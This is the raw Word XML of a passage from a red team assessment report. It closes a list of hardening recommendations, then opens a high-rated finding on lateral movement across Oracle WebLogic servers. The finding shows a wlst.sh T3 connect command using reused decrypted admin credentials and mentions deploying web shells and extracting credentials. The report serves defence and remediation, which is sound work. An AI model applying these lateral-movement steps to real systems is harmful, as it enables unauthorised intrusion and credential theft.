        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Perform regular vulnerability assessments </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">on ETS WebLogic and Tomcat servers </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>by security services such as DIGIT.S1.SA to identify and address instances of insecure credential storage to follow security best practices and compliance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113AFEBB" w14:textId="4A1B576F" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="006E0236" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Enable logging and alerting on use of scripts such as wlst.sh and access to sensitive configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197EE3F1" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Restrict access to the Apache Tomcat management console (Hydra JEE Supervisor) to only authorized staff through robust access controls and network segmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FB52D1" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>All credentials associated with the Hydra JEE Supervisor service should be rotated, and future authentication should be managed through secure secrets management practices to prevent exposure through harvesting or reuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA4F397" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Multi-factor authentication (MFA) should be implemented on Hydra JEE Supervisor instances, if possible, to strengthen access security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221D5A1" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Audit logging for administrative interfaces such as Hydra JEE Supervisor must be enabled and regularly reviewed to detect unauthorized access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370D38F0" w14:textId="77777777" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Systems and services that are not explicitly in scope for Red Team or other security assessments should be hardened and monitored, as their inadvertent exposure can represent a meaningful risk, even if not directly targeted during formal testing activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3128DFBF" w14:textId="68546D00" w:rsidR="006E0236" w:rsidRPr="001019D3" w:rsidRDefault="006E0236" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824715 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> for recommendations for wlst.sh</w:t>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA57749" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DDECC8" w14:textId="2AF9B302" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00560205">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:ind w:left="734" w:hanging="734"/>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc212654663"/>
      <w:bookmarkStart w:id="182" w:name="_Ref212824715"/>
      <w:bookmarkStart w:id="183" w:name="_Ref213099215"/>
      <w:bookmarkStart w:id="184" w:name="_Ref213159271"/>
      <w:bookmarkStart w:id="185" w:name="_Toc213253570"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WebLogic Scripting Tool (WLST)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
      <w:bookmarkEnd w:id="182"/>
      <w:bookmarkEnd w:id="183"/>
      <w:r w:rsidR="002B3751" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and Oracle T3 allows for lateral movement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
      <w:bookmarkEnd w:id="185"/>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416"/>
        <w:gridCol w:w="1914"/>
        <w:gridCol w:w="3106"/>
      </w:tblGrid>
      <w:tr w:rsidR="00560205" w:rsidRPr="001019D3" w14:paraId="7D2AC1C6" w14:textId="77777777" w:rsidTr="0026176B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54D19683" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="078801F9" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2872" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07C073E5" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00560205" w:rsidRPr="001019D3" w14:paraId="6F24DAC3" w14:textId="77777777" w:rsidTr="00334A66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C58C1DD" w14:textId="32B7D173" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00334A66" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24121BB8" w14:textId="3B2E4820" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="0026176B" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ETS Oracle servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1095" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="65BE32FD" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00526786">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="360" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA-0002</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB7093F" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="0026176B">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1777" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="24EAA0F6" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="0026176B">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1072</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07FD4D14" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Software</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Deployment Tools</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B82B57C" w14:textId="77777777" w:rsidR="00526786" w:rsidRPr="001019D3" w:rsidRDefault="00526786" w:rsidP="00526786">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T1021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582DC67F" w14:textId="007918E3" w:rsidR="00526786" w:rsidRPr="001019D3" w:rsidRDefault="00526786" w:rsidP="00526786">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F7CC446" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="006E0236">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19CF22" w14:textId="4B3283F0" w:rsidR="00993EB0" w:rsidRPr="001019D3" w:rsidRDefault="00993EB0" w:rsidP="006E0236">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xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="006E0236" w:rsidRPr="001019D3">
        <w:t>and performing local reconnaissance on the hosts (</w:t>
      </w:r>
      <w:r w:rsidR="006E0236" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006E0236" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824973 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="006E0236" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.3</w:t>
      </w:r>
      <w:r w:rsidR="006E0236" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006E0236" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">), the Red Team found the </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>WebLogic Scripting Tool (</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>wlst.sh</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00072434" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> that, with the discovered high-privileged Oracle credentials</w:t>
      </w:r>
      <w:r w:rsidR="002B3751" w:rsidRPr="001019D3">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00072434" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> allowed using Oracle’s administrative protocol called T3 to do lateral movement to all Oracle servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00828CD9" w14:textId="0623D13F" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="006E0236">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">A local attacker </w:t>
      </w:r>
      <w:r w:rsidR="00993EB0" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">having compromised the </w:t>
      </w:r>
      <w:r w:rsidR="002B3751" w:rsidRPr="001019D3">
        <w:t>WebLogic</w:t>
      </w:r>
      <w:r w:rsidR="00993EB0" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> service account and having access to </w:t>
      </w:r>
      <w:r w:rsidR="00645995" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">management </w:t>
      </w:r>
      <w:r w:rsidR="00993EB0" w:rsidRPr="001019D3">
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00645995" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00993EB0" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00645995" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">that come with </w:t>
      </w:r>
      <w:r w:rsidR="00993EB0" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">WebLogic </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">could use the utility to manage the WebLogic local instance or </w:t>
      </w:r>
      <w:r w:rsidR="00645995" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">access other systems, escalate privileges, propagate further in the environment, potentially leading to full compromise of the </w:t>
      </w:r>
      <w:r w:rsidR="0042025D" w:rsidRPr="001019D3">
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00645995" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6ED2C3" w14:textId="5E4BC04A" w:rsidR="0026176B" w:rsidRPr="001019D3" w:rsidRDefault="0026176B" w:rsidP="0026176B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E436023" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Having access on any WebLogic server, the Red Team simply had to use the </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="MacroTextChar1"/>
        </w:rPr>
        <w:t>wlst.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> command line script interface (installed with WebLogic) and use the decrypted user credentials of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="MacroTextChar1"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="MacroTextChar1"/>
        </w:rPr>
        <w:t>sysop</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to connect to any remote T3 enabled Oracle server. It was discovered that connection to any remote Oracle server worked with the same T3 credentials. This tool allows to run remote method invocation to e.g. read sensitive configuration files from remote WebLogic servers, such as usernames and passwords of other services. Having the same credentials for all servers potentially allows to compromise all hosted WebLogic system in the datacentre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CBE24C" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following commands were executed to establish a connection to other Oracle servers via T3:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8746"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B3751" w:rsidRPr="001019D3" w14:paraId="72D8FA26" w14:textId="77777777" w:rsidTr="00464BA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9518" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4DB577AB" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00464BA6">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$./wlst.sh </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45BCB0D7" w14:textId="10490CBC" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00464BA6">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>wls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:/offline&gt; connect('USERNAME', 'Password', 't3://</w:t>
            </w:r>
            <w:r w:rsidR="00FE3697" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;I</w:t>
            </w:r>
            <w:r w:rsidR="00FE3697" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>P&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="00FE3697" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;Port</w:t>
            </w:r>
            <w:r w:rsidR="00FE3697" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0901800A" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Using the wlst.sh script it was possible to authenticated to the remote WebLogic Management Service over T3/T3S, to then execute commands to deploy web shells, enumerate users, and extract additional credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1999B968" w14:textId="67603E88" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="00075E80" w:rsidP="002B3751">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="724BCAE9" wp14:editId="2613E735">
            <wp:extent cx="5543550" cy="1358900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3072377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7719" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5543550" cy="1358900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A7FFB" w14:textId="10B5F0B8" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_Toc213253799"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Establish remote T3 connection using wlst.sh.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w14:paraId="45BC98AD" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
